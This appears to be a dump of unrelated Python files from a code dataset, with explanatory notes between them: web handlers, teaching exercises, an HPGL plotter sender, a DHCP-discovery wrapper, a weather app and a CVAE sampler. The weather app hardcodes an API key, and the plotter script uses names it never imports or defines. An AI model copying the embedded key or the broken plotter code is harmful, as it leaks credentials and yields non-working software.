@tornado.web.stream_request_body\nclass ImageHandler(BaseHandler):\n '''\n 1. 
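MessageHandler.get above pages with pos = page*nums and flags the end of the data when a page comes back short. The same offset pagination, isolated; fetch is a stand-in for msg.get_messages:

def paginate(fetch, page=0, per=10):
    pos = page * per                          # records to skip
    items = fetch(pos, per)                   # backend applies skip/limit
    is_end = 1 if len(items) < per else 0     # short page => no more data
    return items, is_end

# e.g. against a plain list:
data = list(range(25))
items, is_end = paginate(lambda pos, n: data[pos:pos + n], page=2, per=10)
# items == [20, 21, 22, 23, 24], is_end == 1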
user upload image & update databse\n '''\n # def initialize(self):\n # self.bytes_read = 0\n\n # def data_received(self, data):\n # self.bytes_read += len(data)\n\n def _gen_image_id_(self, *args):\n now = util.now()\n\n return util.md5(now, *args).hexdigest()\n\n def get(self, _id):\n _id = _id.split('.')[0]\n gridout = msg.get_file(_id)\n self.set_header('Content_Type', gridout.content_type)\n self.finish(gridout.read())\n\n def post(self, _id=None):\n '''\n engineer uplaod image\n update engineer's image\n '''\n file_metas = self.request.files['uploadImg']\n filename, ext = _id, ''\n for meta in file_metas:\n filename = meta['filename']\n content_type = meta['content_type']\n \n if not _id:\n _id = self._gen_image_id_(filename, content_type, util.generate_password(8)) \n else:\n # previous data has been existed, delete previous first\n msg.delete_file(_id)\n\n msg.create_file(meta['body'], _id=_id, filename=filename, content_type=content_type)\n break\n\n if filename:\n self.render_json_response(url='/fs/'+_id, **self.OK)\n else:\n raise HTTPError(400)\n \n\n# Jobs handler\nclass JobsHandler(AuthTokenHandler):\n '''\n '''\n JOBS = ['' ,b'']\n\n @classmethod\n def get_jobs(cls, groups):\n '''\n delete yesterday's data\n cache today's data\n # cached 1 hours \n '''\n now = _now('%Y-%d-%m %H')\n if now != cls.JOBS[0]:\n # update data & date\n sociology, school = msg.get_jobs(groups)\n types = msg.get_jobs_types() \n recurt = msg.get_recrut_types()\n address = msg.get_jobs_address()\n \n _01 = msg.get_message(groups+'-01')\n _02 = msg.get_message(groups+'-02')\n\n cls.JOBS[1] = json_encoder({'job_type':types, 'job_address':address, 'recrut_type':recurt,\n 'sociology':sociology, 'school':school, groups+'-01':_01, groups+'-02':_02, \n 'Code':200, 'Msg':'OK'})\n\n cls.JOBS[0] = now\n\n return cls.JOBS[1] \n\n def get(self, _id=''):\n '''\n get special & all jobs\n '''\n if _id:\n job = msg.get_job(_id)\n if not job:\n raise HTTPError(404)\n self.render_json_response(Code=200, Msg='OK', **job)\n else:\n user = self.get_argument('manager', '') or self.get_argument('user', '')\n is_cms = False\n if user:\n self.check_token()\n is_cms = True \n groups = manager.check_location(user)\n else:\n groups = self.get_argument('groups')\n\n if is_cms:\n # get_all jobs, not read from cache\n # disable cache\n self.JOBS[0] = ''\n data = self.get_jobs(groups)\n self.set_header('Content-Type', 'application/json;charset=utf-8')\n self.finish(data)\n else:\n data = self.get_jobs(groups)\n seconds = 86400 # 86400 seconds = 1 day\n self.set_header('Expires', datetime.datetime.utcnow()+datetime.timedelta(seconds=seconds))\n self.set_header('Cache-Control', 'max-age='+str(seconds))\n\n self.set_header('Content-Type', 'application/json;charset=utf-8')\n self.finish(data)\n\n \n\n def post(self, _id=''):\n user = self.get_argument('manager') or self.get_argument('user')\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs.pop('token')\n kwargs.pop('manager', '')\n kwargs.pop('user', '')\n kwargs['groups'] = manager.check_location(user)\n \n msg.create_job(**kwargs)\n self.render_json_response(**self.OK)\n \n def put(self, _id):\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs.pop('token')\n kwargs.pop('manager', '')\n kwargs.pop('user', '')\n\n msg.update_job(_id, **kwargs)\n self.render_json_response(**self.OK)\n\n def delete(self, _id):\n self.check_token()\n\n msg.delete_job(_id)\n 
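JobsHandler.get_jobs above memoizes one serialized payload per wall-clock hour in the two-slot class list JOBS (its format string '%Y-%d-%m %H' transposes day and month, which is harmless as a cache key but looks like a typo). A generic sketch of that time-bucketed cache pattern:

import time

class HourCache:
    # [bucket_key, cached_value], shared across instances like JOBS above
    _slot = ['', None]

    @classmethod
    def get(cls, compute):
        bucket = time.strftime('%Y-%m-%d %H')   # one key per hour
        if bucket != cls._slot[0]:
            cls._slot[1] = compute()            # refresh the cached payload
            cls._slot[0] = bucket
        return cls._slot[1]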
self.render_json_response(**self.OK)\n\n# Jobs type handler\nclass JobsTypeHandler(AuthTokenHandler):\n '''\n '''\n @classmethod\n def check_name(cls, name):\n '''\n check name: if already return True, else False\n '''\n types = msg.get_jobs_types() \n return True if name in types.values() else False\n\n\n def get(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n types = msg.get_jobs_types() \n\n self.render_json_response(job_type=types, **self.OK)\n\n def post(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.create_jobs_type(name)\n\n self.render_json_response(**self.OK)\n\n def put(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.update_jobs_type(_id, name)\n\n self.render_json_response(**self.OK)\n\n# Jobs address handler\nclass JobsAddressHandler(AuthTokenHandler):\n '''\n '''\n @classmethod\n def check_name(cls, name):\n '''\n check name: if already return True, else False\n '''\n address = msg.get_jobs_address() \n return True if name in address.values() else False\n\n def get(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n address = msg.get_jobs_address() \n\n self.render_json_response(job_address=address, **self.OK)\n\n def post(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.create_jobs_address(name)\n\n self.render_json_response(**self.OK)\n\n def put(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.update_jobs_address(_id, name)\n\n self.render_json_response(**self.OK)\n\n","sub_path":"handler/cms.py","file_name":"cms.py","file_ext":"py","file_size_in_byte":17599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292817395","text":"\"\"\"\n\nAuthors: David Mutchler, Chandan Rupakheti, their colleagues,\n and Eric Tan (CM 2991). March 2013.\n\"\"\" \n\nimport zellegraphics as zg\n\ndef main():\n \"\"\" Calls the TEST functions in this module. \"\"\"\n test_problem3()\n \ndef close_window(window):\n \"\"\"\n Displays a message at the bottom of the given window telling the user\n to click the mouse when done, waits for a mouse click, and then\n closes the window when the user clicks the mouse.\n Precondition: the argument is a zg.GraphWin.\n \"\"\"\n width = window.getWidth()\n height = window.getHeight()\n bottom = zg.Point(width / 2, height - 15)\n text = zg.Text(bottom, 'Click anywhere in here to exit.')\n text.draw(window)\n \n window.getMouse() # Wait for the user to click,\n window.close() # then close the window.\n \ndef test_problem3():\n \"\"\" Tests the problem3 function. 
\"\"\"\n window1 = zg.GraphWin('Testing Circles!', 750, 750)\n circle1 = zg.Circle(zg.Point(300, 300), 200)\n circle2 = zg.Circle(zg.Point(500, 300), 100)\n circle3 = zg.Circle(zg.Point(300, 200), 20)\n problem3(window1, circle1)\n problem3(window1, circle2)\n close_window(window1)\n window2 = zg.GraphWin('Testing Circles!', 770, 770)\n problem3(window2, circle3)\n close_window(window2)\n \n \ndef problem3(window, circle):\n \"\"\"\n 1. Draws two zg.Circle's on the given zg.GraphWin, as follows:\n \n -- The first zg.Circle is the given zg.Circle.\n \n -- The second zg.Circle is a new zg.Circle whose center is the\n same as the center of the given zg.Circle but whose radius\n is HALF the radius of the given zg.Circle.\n Also, this second zg.Circle has 'blue' as its fill color.\n \n 2. Waits for a mouse-click.\n \n 3. UN-draws both of the zg.Circle's just drawn.\n \n Drawing the circles in the order listed ensures that the\n second one drawn is visible on top of the (larger) first one drawn.\n \n Preconditions: The first argument is a zg.GraphWin, and the second\n argument is a zg.Circle that fits inside the zg.GraphWin.\n \n \"\"\"\n \n circle.draw(window)\n newcircle = zg.Circle((circle.getCenter()), (circle.getRadius()) / 2)\n newcircle.setFill('blue')\n newcircle.draw(window)\n window.getMouse()\n circle.undraw()\n newcircle.undraw()\n \n \n \n#------------------------------------------------------------------------\n# If this module is running at the top level (as opposed to being\n# imported by another module), then call the 'main' function.\n#------------------------------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"drawing-circles.py","file_name":"drawing-circles.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"331371395","text":"import argparse\nimport serial\nimport time\nimport os\n\ndef show_progress(pos, total, length=100):\n fill = length * pos // total\n print('\\rProgress: [' + fill * '\\u2592' + (length-fill) * '\\u2591' + '] ' + str(pos) + ' of ' + str(total), end='\\r')\n if pos == total:\n print()\n return 0\n\ndef fileCheck(checkFile=\"/Users/user/Desktop/hpglsender/test.txt\", position=0):\n \n transport_string = []\n \n def charCheck():\n CCC = transport_string[(len(transport_string)-1)]\n if (CCC != \",\" and CCC != \";\"):\n print(\"A\"+transport_string[(len(transport_string)-1)])\n return 1\n elif (CCC == \",\" or CCC == \";\"):\n print(\"B\"+transport_string[(len(transport_string)-1)])\n return 0\n elif (CCC == '\\0'):\n print(\"C\"+transport_string[(len(transport_string)-1)])\n return 2\n else:\n print(\"F\"+transport_string[(len(transport_string)-1)])\n return None\n \n def byteRead(readFile, readPos):\n readFile.seek(readPos)\n return readFile.read(1)\n \n \n distIntoFile = position\n checkFile = open(checkFile, \"r\")\n transport_string = byteRead(checkFile, distIntoFile)\n print(\"yo\", transport_string)\n distIntoFile += 1 #idk why but this makes it work\n charOK = 0\n \n while charOK == 0:\n CDC = charCheck()\n print(\"hecc \", transport_string)\n if (CDC == 0):\n charOK = 1\n #time.sleep(sleepTime)\n pauseBit = 1\n print(\"cc0\")\n print(\"dist \", distIntoFile)\n elif (CDC == 2):\n charOK = 1\n pauseBit = 0\n print(\"cc1\")\n #break or whatev\n elif (CDC == 1):\n charOK = 0\n pauseBit = 0\n print(\"cc2\")\n transport_string += byteRead(checkFile, distIntoFile)\n distIntoFile += 1\n print(\"dist \", 
distIntoFile)\n \n checkFile.close()\n returnDataStruct = namedtuple('returnDataStruct', 'int_Dist, str_Data, bool_Pause')\n returnData = returnDataStruct(distIntoFile, transport_string, pauseBit)\n \n return returnData;\n \n \n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('port', default='/dev/tty.usbserial',\n help='serial port location, def: /dev/tty.usbserial')\n parser.add_argument('file', help='/path/to/file.hpgl')\n parser.add_argument('--sleeptime', default=5,\n help='seconds to wait for plotter to clear buffer, def:5')\n args = parser.parse_args()\n \n serial = Serial(port=args.port, timeout=0) #open port\n \n fileSize = os.path.getsize(args.file)\n distanceIntoFile = 0\n \n while distanceIntoFile < fileSize:\n dataTuple = fileCheck(args.file, pos_)\n distanceIntoFile = dataTuple.int_Dist\n dataPacket = dataTuple.str_Data\n doPause = dataTuple.bool_Pause\n if doPause == 1:\n #actually send serial line the dataPacket\n serial.write(dataPacket)\n time.sleep(args.sleeptime)\n \n \n #hpgl = read_hpgl(args.file)\n pos = 0","sub_path":"hpgl serial interface/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200574046","text":"#!/usr/bin/python3.5\nimport subprocess\nimport re\ndef run(repe):\n dhcpList=[]\n OneDHCP=[]\n parsedDHCP=[]\n for i in range(0, repe):\n output = subprocess.check_output([\"nmap\", \"--script=broadcast-dhcp-discover\"])\n for c in range(0, 14):\n if c != 0 and c != 1 and c != 2 and c!=3 and c!= 4 and c!=6 and c!= 13 and c!=14 and len(str(output).split(\"\\\\n\")) >= 10:\n helpme = (str(output).split(\"\\\\n\")[c].split(\":\")[1].strip())\n OneDHCP.append(helpme)\n elif len(str(output).split(\"\\\\n\")) <= 10:\n helpme = None\n OneDHCP.append(helpme)\n parsedDHCP.append(OneDHCP[1]) #0\n try:\n domainname = subprocess.check_output(['nslookup', OneDHCP[1]]) #1\n domainname = str(domainname).split(\".\\\\n\")[0].split(\"=\")[1]\n except Exception:\n parsedDHCP.append(None)\n else:\n parsedDHCP.append(domainname)\n parsedDHCP.append(None) #2\n parsedDHCP.append(None) #3\n parsedDHCP.append(OneDHCP[2]) #4\n parsedDHCP.append(OneDHCP[0]) #5\n parsedDHCP.append(OneDHCP[3]) #6\n parsedDHCP.append(OneDHCP[4]) #7\n parsedDHCP.append(OneDHCP[6]) #8\n parsedDHCP.append(None) #9\n\n dhcpList.append(parsedDHCP)\n OneDHCP=[]\n parsedDHCP=[]\n returnarray = []\n inreturn = [\"dummy\"]\n\n for j in range(len(dhcpList)):\n if dhcpList[j][0] == None:\n x = 0\n elif dhcpList[j][0] in str(inreturn):\n x = 0\n else:\n returnarray.append(dhcpList[j])\n inreturn.append(dhcpList[j][0])\n return returnarray\n","sub_path":"Network_Snapshot_Appliance/Datenbeschaffung/dhcp_discovery.py","file_name":"dhcp_discovery.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19849656","text":"# -*- coding:utf-8 -*-\n#method1\nclass Solution:\n # 这里要特别注意~找到任意重复的一个值并赋值到duplication[0]\n # 函数返回True/False\n def duplicate(self, numbers, duplication):\n # write code here\n hashmap={}\n for each in numbers:\n hashmap[each]=hashmap.get(each,0)+1\n counter = 0\n for element in numbers:\n if hashmap[element]>1:\n duplication[0] = element\n counter+=1\n break\n return counter>=1 \n\n\n#method2: 85.7%通过 ;解法二:高赞回答里的“高级方法” 前排说一下,这种方法并不能够输出“第一个重复的数字”,举例:[3,2,1,1,3],第一个重复的数字是3,但是输出是1\n# -*- coding:utf-8 -*-\nclass Solution:\n # 这里要特别注意~找到任意重复的一个值并赋值到duplication[0]\n # 
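main() in the hpgl __main__.py record above calls ArgumentParser, Serial and namedtuple unqualified even though only argparse, serial, time and os are imported, passes an undefined pos_ into fileCheck, and writes a str to the serial port. A corrected skeleton keeping the original flow; fileCheck is assumed to be the function defined in the record:

import argparse
import os
import time
from collections import namedtuple   # needed by fileCheck in the record

import serial as pyserial            # alias avoids shadowing by locals


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('port', help='serial port, e.g. /dev/tty.usbserial')
    parser.add_argument('file', help='/path/to/file.hpgl')
    parser.add_argument('--sleeptime', type=float, default=5,
                        help='seconds to wait for plotter to clear buffer, def:5')
    args = parser.parse_args()

    conn = pyserial.Serial(port=args.port, timeout=0)   # open the port
    file_size = os.path.getsize(args.file)
    pos = 0
    while pos < file_size:
        chunk = fileCheck(args.file, pos)      # returns the record's namedtuple
        pos = chunk.int_Dist
        if chunk.bool_Pause:
            conn.write(chunk.str_Data.encode('ascii'))  # bytes, not str
            time.sleep(args.sleeptime)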
函数返回True/False\n def duplicate(self, numbers, duplication):\n index = 0\n while index < len(numbers):\n if numbers[index] == index:\n index += 1\n elif numbers[index] == numbers[numbers[index]]:\n duplication[0] = numbers[index]\n return True\n else:\n index_2 = numbers[index]\n numbers[index],numbers[index_2] = numbers[index_2],numbers[index]\n return False","sub_path":"jianzhi_offer/50.py","file_name":"50.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232388457","text":"#-------------------------------------------------------------------------------\r\n# Name: Weather Application by BoredProgrammers\r\n# Purpose: Open Source\r\n#\r\n# Author: BoredProgrammers\r\n#\r\n# Created: 26/12/2019\r\n# Copyright: (c) BoredProgrammers 2019\r\n# Website: www.boredprogrammers.com\r\n#-------------------------------------------------------------------------------\r\nimport requests as rt\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\nimport colour\r\n\r\n#https://api.openweathermap.org/data/2.5/weather?q=Delhi,In&appid=2ba176b6779095cdadce08734e517654\r\n\r\nclass connection:\r\n def __init__(self):\r\n return None\r\n\r\n def responsecheck(self,link):\r\n self.response = rt.get(link)\r\n if self.response.status_code == 401:\r\n return \"Error 401\"\r\n else:\r\n self.jsondata = self.response.json()\r\n return self.jsondata\r\n\r\nclass graphical:\r\n def __init__(self,twindow):\r\n self.twindow = twindow\r\n self.link = \"https://api.openweathermap.org/data/2.5/weather?q={}&appid=2ba176b6779095cdadce08734e517654\"\r\n self.country = tk.Label(twindow,text=\"Country:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=30)\r\n self.countrytext = tk.Label(twindow,text=\"NIL\",bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.country.grid(row=1,column=0,sticky=tk.W)\r\n self.countrytext.grid(row=1,column=1,sticky=tk.E)\r\n\r\n self.location = tk.Label(twindow,text=\"Location:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=26.5)\r\n self.locationtext = tk.Label(twindow,text=\"NIL\",bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=24)\r\n self.location.grid(row=2,column=0,sticky=tk.W)\r\n self.locationtext.grid(row=2,column=1,sticky=tk.E)\r\n\r\n self.degree = tk.Label(twindow,text=\"Degree:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=35)\r\n self.degreetext = tk.Label(twindow,text=\"NIL\",bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.degree.grid(row=3,column=0,sticky=tk.W)\r\n self.degreetext.grid(row=3,column=1,sticky=tk.E)\r\n\r\n self.enterlocation = tk.Label(twindow,text=\"Enter location:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=3)\r\n self.textbox = tk.Text(twindow,height=1,width=15)\r\n self.enterlocation.grid(row=4,column=0,sticky=tk.W)\r\n self.textbox.grid(row=4,column=1,sticky=tk.E)\r\n\r\n self.searchbutton = tk.Button(twindow,height=2,width=15,text=\"Search Location\",padx=20,command=self.locini)\r\n self.searchbutton.grid(row=5,column=1)\r\n\r\n self.tempcolorbar = tk.Button(twindow,height=2,width=15,text=\"Temp Bar\",command=self.temcolobar,padx=20)\r\n self.tempcolorbar.grid(row=5,column=0)\r\n\r\n def temcolobar(self):\r\n messagebox.showinfo(\"Temperature info\", \"Mainwindow Background shows the temperature color\")\r\n\r\n def locini(self):\r\n self.colorcode = \"\"\r\n self.tempvar = 
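As the comment in the 50.py record above says, the swap-in-place approach reports a duplicate but not necessarily the first one. Tracing its second Solution class over [3, 2, 1, 1, 3]: each pass moves numbers[i] toward slot numbers[i] until a slot already holds its own value, which exposes a duplicate:

dup = [-1]
found = Solution().duplicate([3, 2, 1, 1, 3], dup)   # second class in the record
# swaps: [3,2,1,1,3] -> [1,2,1,3,3] -> [2,1,1,3,3] -> [1,1,2,3,3]
# then numbers[0] == numbers[numbers[0]] == 1, so found == True, dup == [1]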
self.textbox.get('1.0',tk.END)\r\n self.templink = self.link.format(self.tempvar)\r\n self.obj = connection()\r\n self.data = self.obj.responsecheck(self.templink)\r\n\r\n print(self.data)\r\n if self.data == {'cod': '404', 'message': 'city not found'}:\r\n return None\r\n else:\r\n if int(self.data[\"main\"][\"temp\"])-273 < 0:\r\n self.twindow.configure(background=\"#3366cc\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 0 and int(self.data[\"main\"][\"temp\"])-273 < 10:\r\n self.twindow.configure(background=\"#0099ff\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 10 and int(self.data[\"main\"][\"temp\"])-273 < 20:\r\n self.twindow.configure(background=\"#99ccff\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 20 and int(self.data[\"main\"][\"temp\"])-273 < 30:\r\n self.twindow.configure(background=\"#ffff66\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 30 and int(self.data[\"main\"][\"temp\"])-273 < 40:\r\n self.twindow.configure(background=\"#ffff00\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 40:\r\n self.twindow.configure(background=\"#cc9900\")\r\n self.degreetext = tk.Label(self.twindow,text=int(self.data[\"main\"][\"temp\"])-273,bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.degreetext.grid(row=3,column=1,sticky=tk.E)\r\n\r\n self.countrytext = tk.Label(self.twindow,text=self.data[\"sys\"][\"country\"],bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.countrytext.grid(row=1,column=1,sticky=tk.E)\r\n\r\n self.locationtext = tk.Label(self.twindow,text=self.data[\"name\"],bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=24)\r\n self.locationtext.grid(row=2,column=1,sticky=tk.E)\r\n\r\nmain = tk.Tk()\r\nmain.geometry(\"310x250\")\r\nmain.resizable(0, 0)\r\nmain.title(\"Weather Application \")\r\ncolorcode = \"\"\r\nmain.configure(background='#0099ff')\r\ng = graphical(main)\r\ng.locini()\r\n\r\nmain.mainloop()","sub_path":"wheatherapp.py","file_name":"wheatherapp.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554198550","text":"\"\"\"ServeMed URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
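The temperature-to-background chain in locini above tests strict inequalities, so the exact boundary values (0, 10, 20, 30, 40 deg C) match no branch and leave the window color unchanged. A table plus bisect covers every value with one lookup; the hex colors are copied from the record, the helper name is ours:

import bisect

BOUNDS = [0, 10, 20, 30, 40]
COLORS = ['#3366cc', '#0099ff', '#99ccff', '#ffff66', '#ffff00', '#cc9900']

def temp_color(kelvin):
    celsius = kelvin - 273                       # same conversion as the record
    return COLORS[bisect.bisect_right(BOUNDS, celsius)]

# temp_color(283) -> '#99ccff' (10 C falls into the 10-20 band here)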
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.conf.urls import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom hhands import views\n\nfrom hhands.views import index, ChartData, index_TIBar, BarChart\n\nurlpatterns = [\n url(r'^$',views.home, name='home'),\n url(r'^home',views.home, name='home'),\n url(r'^setup',views.setup, name='setup'),\n url(r'^customerlogin',views.customerlogin, name='customerlogin'),\n url(r'^physicians',views.physicians, name='physicians'),\n url(r'^dashboard',index_TIBar.as_view(), name='dashboard'),\n url(r'^index_TIBar',index.as_view(), name='index_TIBar'),\n url(r'^api/chart/data/$', ChartData.as_view()),\n url(r'^api/chart1/data/$', BarChart.as_view()),\n url(r'^checkout',views.CheckoutView.as_view(), name='checkout'),\n\n #url(r'^index_TIBar',views.index_TIBar, name='index_TIBar'),\n url(r'^data/Med',views.Med, name='Med'),\n url(r'^data/us',views.usdata, name='usdata'),\n url(r'^settings',views.customersettings, name='settings'),\n url(r'^enrollconfirmation',views.enrollconfirmation, name='enrollconfirmation'),\n url(r'^InformationSaved',views.InformationSaved, name='InformationSaved'),\n url(r'^HCPInfo',views.PhysicianInformation, name='PhysicianInformation'),\n url(r'^admin/', admin.site.urls),\n url(r'^base',views.base, name='base'),\n url(r'^hhands/',include('hhands.urls',namespace='hhands')),\n url(r'hhands/',include('django.contrib.auth.urls')),\n url(r'^test/$',views.testpage.as_view(), name='test'),\n url(r'^thanks/$',views.thankspage.as_view(), name='thanks'),\n\n url(r'^shop/',include('shop.urls')),\n url(r'^search/',include('search_app.urls')),\n url(r'^cart/',include('cart.urls')),\n url(r'^order/',include('order.urls')),\n\n]\n\nif settings.DEBUG:\n\turlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n\turlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n","sub_path":"ServeMed/ServeMed/urls_bak.py","file_name":"urls_bak.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"166194349","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport os\n#from torch.autograd import Variable\nimport procesImages as input_data\nimport time\nimport sys, librosa, analyzer, dataParser\n\ninput_song = \"\"\ninput_time = 0\nif len(sys.argv) == 3:\n input_song = sys.argv[1]\n input_time = int(sys.argv[2])\n print(\"For analyzation: \" + input_song + \" at second \" + str(input_time))\nelse:\n print(\"Invalid num of arguments\")\n quit()\n\nmb_size = 20\nz_dim = 100\nX_dim = input_data.WIDTH * input_data.HEIGHT\ny_dim = 28\nh_dim = 128\nc = 0\nlr = 1e-3\n\n\ndef plot(samples):\n fig = plt.figure(figsize=(4, 4))\n gs = gridspec.GridSpec(4, 4)\n gs.update(wspace=0.05, hspace=0.05)\n\n for i, sample in enumerate(samples):\n ax = plt.subplot(gs[i])\n plt.axis('off')\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n plt.imshow(sample.reshape(input_data.HEIGHT, input_data.WIDTH), cmap='Greys_r')\n\n return fig\n\n\ndef xavier_init(size):\n in_dim = size[0]\n xavier_stddev = 1. 
/ tf.sqrt(in_dim / 2.)\n return tf.random_normal(shape=size, stddev=xavier_stddev)\n\n\n# =============================== Q(z|X) ======================================\n\nX = tf.placeholder(tf.float32, shape=[None, X_dim])\nc = tf.placeholder(tf.float32, shape=[None, y_dim])\nz = tf.placeholder(tf.float32, shape=[None, z_dim])\n\nQ_W1 = tf.Variable(xavier_init([X_dim + y_dim, h_dim]))\nQ_b1 = tf.Variable(tf.zeros(shape=[h_dim]))\n\nQ_W2_mu = tf.Variable(xavier_init([h_dim, z_dim]))\nQ_b2_mu = tf.Variable(tf.zeros(shape=[z_dim]))\n\nQ_W2_sigma = tf.Variable(xavier_init([h_dim, z_dim]))\nQ_b2_sigma = tf.Variable(tf.zeros(shape=[z_dim]))\n\n\ndef Q(X, c):\n inputs = tf.concat(axis=1, values=[X, c])\n h = tf.nn.relu(tf.matmul(inputs, Q_W1) + Q_b1)\n z_mu = tf.matmul(h, Q_W2_mu) + Q_b2_mu\n z_logvar = tf.matmul(h, Q_W2_sigma) + Q_b2_sigma\n return z_mu, z_logvar\n\n\ndef sample_z(mu, log_var):\n eps = tf.random_normal(shape=tf.shape(mu))\n return mu + tf.exp(log_var / 2) * eps\n\n\n# =============================== P(X|z) ======================================\n\nP_W1 = tf.Variable(xavier_init([z_dim + y_dim, h_dim]))\nP_b1 = tf.Variable(tf.zeros(shape=[h_dim]))\n\nP_W2 = tf.Variable(xavier_init([h_dim, X_dim]))\nP_b2 = tf.Variable(tf.zeros(shape=[X_dim]))\n\n\ndef P(z, c):\n inputs = tf.concat(axis=1, values=[z, c])\n h = tf.nn.relu(tf.matmul(inputs, P_W1) + P_b1)\n logits = tf.matmul(h, P_W2) + P_b2\n prob = tf.nn.sigmoid(logits)\n return prob, logits\n\n\n# =============================== TRAINING ====================================\n\"\"\"\nz_mu, z_logvar = Q(X, c)\nz_sample = sample_z(z_mu, z_logvar)\n_, logits = P(z_sample, c)\n\"\"\"\n# Sampling from random z\nX_samples, _ = P(z, c)\n\n\"\"\"\n# E[log P(X|z)]\nrecon_loss = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=X), 1)\n# D_KL(Q(z|X) || P(z|X)); calculate in closed form as both dist. are Gaussian\nkl_loss = 0.5 * tf.reduce_sum(tf.exp(z_logvar) + z_mu**2 - 1. 
- z_logvar, 1)\n# VAE loss\nvae_loss = tf.reduce_mean(recon_loss + kl_loss)\n\nsolver = tf.train.AdamOptimizer().minimize(vae_loss)\nsummary = tf.summary.scalar('VAE_loss', vae_loss)\n\"\"\"\n\n#data = np.load(\"..\\\\data_S.npy\")\n\nwith tf.Session() as sess:\n# merge = tf.summary.merge([summary])\n# train_writer = tf.summary.FileWriter('\\\\tmp\\\\train_vae\\\\1', sess.graph)\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n saver.restore(sess, '\\\\tmp\\\\model\\\\cvae_model3.ckpt')\n\n if not os.path.exists('outV/'):\n os.makedirs('outV/')\n\n i = 0\n\n batch = []\n for i in range(16):\n print('Scaning ' + input_song + \" \" + str(i))\n try:\n song, sr = librosa.load(input_song, offset = input_time + i, duration = 25, sr = 22050)\n except:\n raise ValueError(\"Something wrong with load of \" + input_song)\n\n song_np = analyzer.analyzeLoadedSong(song, sr)\n song_np = dataParser.normalizeSong(\"..\\\\mini_data_S_notNorm.npy\", song_np)\n batch.append(song_np)\n\n samples = sess.run(X_samples,\n feed_dict={z: np.random.randn(16, z_dim), c: batch})\n\n fig = plot(samples)\n\n name = time.strftime('%d_%m_%Y_%H_%M_%S')\n name = \"outV/\" + name + \".png\"\n plt.savefig(name, bbox_inches='tight')\n i += 1\n 